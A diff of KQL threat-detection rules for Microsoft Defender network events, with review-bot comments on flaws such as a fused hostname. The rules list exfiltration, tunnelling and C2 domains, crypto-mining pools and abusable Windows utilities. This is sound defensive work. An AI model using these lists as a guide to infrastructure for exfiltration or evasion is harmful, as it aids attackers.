(InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql new file mode 100644 index 00000000..2a539c84 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_portmap_io_domain.kql @@ -0,0 +1,12 @@ +// Title: Network Communication Initiated To Portmap.IO Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors +// MITRE Tactic: Command and Control +// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration +// False Positives: +// - Legitimate use of portmap.io domains + +DeviceNetworkEvents +| where RemoteUrl endswith ".portmap.io" \ No newline at end of file 
diff --git a/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql new file mode 100644 index 00000000..eaba9eb0 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_communication_with_crypto_mining_pool.kql 
@@ -0,0 +1,12 @@ +// Title: Network Communication With Crypto Mining Pool +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects initiated network connections to crypto mining pools +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", 
"mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", 
"turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru") \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql new file mode 100644 index 00000000..3b1ea25d --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_addinutil_exe.kql 
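Review bot: The list entry `"pangolinminer.comgandalph3000.com"` looks like two hostnames (pangolinminer.com and gandalph3000.com) fused into one, so neither of them is actually matched; if the source Sigma rule carries the same value it should be corrected upstream, otherwise this is a conversion defect. More broadly, `RemoteUrl in~ (...)` is an exact hostname comparison, so region or worker labels of the listed pools match only when spelled out individually (the list already enumerates `xmr-eu1.nanopool.org`, `xmr-eu2.nanopool.org` and so on); for a high-level rule an `endswith`-based match over the registrable pool domains would be more robust, at the cost of more hits to triage. This hunk's single `where` clause spans three physical lines here.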
@@ -0,0 +1,11 @@ +// Title: Network Connection Initiated By AddinUtil.EXE +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: high +// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". +// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\addinutil.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql new file mode 100644 index 00000000..4ffa0cdd --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_eqnedt32_exe.kql @@ -0,0 +1,12 @@ +// Title: Network Connection Initiated By Eqnedt32.EXE +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-14 +// Level: high +// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql new file mode 100644 index 00000000..d7c11ee2 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_imewdbld_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Network Connection Initiated By IMEWDBLD.EXE +// Author: frack113 +// Date: 2022-01-22 +// Level: high +// Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\IMEWDBLD.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql new file mode 100644 index 00000000..247bc43b --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_by_regsvr32_exe.kql @@ -0,0 +1,10 @@ +// Title: Network Connection Initiated By Regsvr32.EXE +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: medium +// Description: Detects a network connection initiated by "Regsvr32.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql new file mode 100644 index 00000000..4594e5e1 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql 
@@ -0,0 +1,10 @@ +// Title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Videos\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl 
endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql new file mode 100644 index 00000000..75b2be6b --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql 
@@ -0,0 +1,10 @@ +// Title: Network Connection Initiated To AzureWebsites.NET By Non-Browser Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1102.001 + +DeviceNetworkEvents +| where RemoteUrl endswith "azurewebsites.net" and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or 
(InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and 
(InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\"))))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql new file mode 100644 index 00000000..fac0a202 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_btunnels_domains.kql 
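Review bot: Several entries in the browser allowlist are path-only, e.g. `InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"` and the Discord, Opera, Vivaldi and Maxthon entries under `\\AppData\\Local\\`, so any binary carrying that name in a user-writable folder is exempted from the azurewebsites.net check; pairing these with `InitiatingProcessVersionInfoCompanyName` (available on DeviceNetworkEvents) would tighten the exclusion, though that goes beyond the source Sigma filter. Two style points in the same hunk read as converter artifacts: `endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe"` uses `endswith` on a fully rooted path, which is effectively an equality test, and `contains "C:\\Program Files\\Windows Defender\\"` is really a `startswith`. Finally, `InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)` drops events with no recorded initiator entirely, which deserves a comment such as `// Note: events without an initiating process path are excluded` so the gap is deliberate rather than accidental.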
@@ -0,0 +1,13 @@ +// Title: Network Connection Initiated To BTunnels Domains +// Author: Kamran Saifullah +// Date: 2024-09-13 +// Level: medium +// Description: Detects network connections to BTunnels domains initiated by a process on the system. +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of BTunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".btunnel.co.in" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql new file mode 100644 index 00000000..c3702834 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_cloudflared_tunnels_domains.kql @@ -0,0 +1,13 @@ +// Title: Network Connection Initiated To Cloudflared Tunnels Domains +// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-27 +// Level: medium +// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of cloudflare tunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file 
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql new file mode 100644 index 00000000..1a096444 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_devtunnels_domain.kql @@ -0,0 +1,12 @@ +// Title: Network Connection Initiated To DevTunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572 +// False Positives: +// - Legitimate use of Devtunnels will also trigger this. + +DeviceNetworkEvents +| where RemoteUrl endswith ".devtunnels.ms" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql new file mode 100644 index 00000000..bcb89fe0 --- /dev/null +++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_mega_nz.kql 
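Review bot: The description in network_connection_initiated_to_mega_nz.kql states that the rule detects connections to "api.mega.co.nz", but the query matches any host ending in `mega.co.nz` or `mega.nz`, including the public web site, which is considerably broader and is presumably why the level is `low`. The header should describe what the query does, e.g. `// Description: Detects a network connection initiated by a binary to MEGA domains ("mega.co.nz", "mega.nz").` This mismatch is likely inherited from the source Sigma rule, so a converter-side change alone would not persist it; it should be raised upstream as well.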
@@ -0,0 +1,13 @@
+// Title: Network Connection Initiated To Mega.nz
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: low
+// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
+// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
new file mode 100644
index 00000000..77c83489
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel will also trigger this.
+
+DeviceNetworkEvents
+| where RemoteUrl endswith ".tunnels.api.visualstudio.com"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
new file mode 100644
index 00000000..4f4f0ae3
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_finger_exe.kql
@@ -0,0 +1,15 @@
+// Title: Network Connection Initiated via Finger.EXE
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-19
+// Level: high
+// Description: Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
+// In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
+// Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
+// Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.004, attack.execution, attack.t1059.003
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\finger.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
new file mode 100644
index 00000000..60cad49f
--- /dev/null
+++ b/KQL/rules/windows/network_connection/network_connection_initiated_via_notepad_exe.kql
@@ -0,0 +1,14 @@
+// Title: Network Connection Initiated Via Notepad.EXE
+// Author: EagleEye Team
+// Date: 2020-05-14
+// Level: high
+// Description: Detects a network connection that is initiated by the "notepad.exe" process.
+// This might be a sign of process injection from a beacon process or something similar.
+// Notepad rarely initiates a network communication except when printing documents for example.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Printing documents via notepad might cause communication with the printer via port 9100 or similar.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
new file mode 100644
index 00000000..5feed99f
--- /dev/null
+++ b/KQL/rules/windows/network_connection/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql
@@ -0,0 +1,14 @@
+// Title: New Connection Initiated To Potential Dead Drop Resolver Domain
+// Author: Sorina Ionescu, X__Junior (Nextron Systems)
+// Date: 2022-08-17
+// Level: high
+// Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
+// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1102.001
+// False Positives:
+// - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.
+// - Ninite contacting githubusercontent.com
+
+DeviceNetworkEvents
